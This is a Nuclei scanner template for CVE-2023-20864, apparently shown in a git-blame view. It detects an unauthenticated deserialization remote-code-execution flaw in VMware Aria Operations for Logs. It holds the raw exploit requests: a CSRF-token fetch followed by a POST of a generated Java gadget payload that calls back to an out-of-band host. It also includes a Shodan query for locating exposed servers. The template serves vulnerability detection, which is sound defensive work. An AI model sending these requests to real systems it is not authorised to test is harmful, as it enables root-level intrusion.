nuclei-templates/http/cves/2023/CVE-2023-20864.yaml

65 lines
1.8 KiB
YAML
Raw Normal View History

2023-04-25 15:24:16 +00:00
id: CVE-2023-20864
info:
name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.
2023-04-25 15:24:16 +00:00
reference:
- https://www.vmware.com/security/advisories/VMSA-2023-0007.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-20864
2023-07-11 19:49:27 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-20864
cwe-id: CWE-502
2023-10-14 11:27:55 +00:00
epss-score: 0.18239
epss-percentile: 0.95586
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:*
2023-04-25 15:24:16 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: vmware
product: aria_operations_for_logs
2023-09-06 11:43:37 +00:00
shodan-query: title:"vRealize Log Insight"
tags: cve,cve2023,vmware,aria,rce,oast
2023-04-25 15:24:16 +00:00
2023-05-09 12:43:13 +00:00
http:
2023-04-25 15:24:16 +00:00
- raw:
- |
GET /csrf HTTP/1.1
Host: {{Hostname}}
X-Csrf-Token: Fetch
- |
POST /api/v2/internal/cluster/applyMembership HTTP/1.1
Host: {{Hostname}}
X-CSRF-Token: {{xcsrftoken}}
Content-type: application/octet-stream
{{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
cookie-reuse: true
2023-07-11 19:49:27 +00:00
2023-04-25 15:24:16 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- '"errorMessage":"Internal error'
extractors:
- type: kval
name: xcsrftoken
group: 1
2023-07-11 19:49:27 +00:00
internal: true
2023-04-25 15:24:16 +00:00
kval:
- "X_CSRF_Token"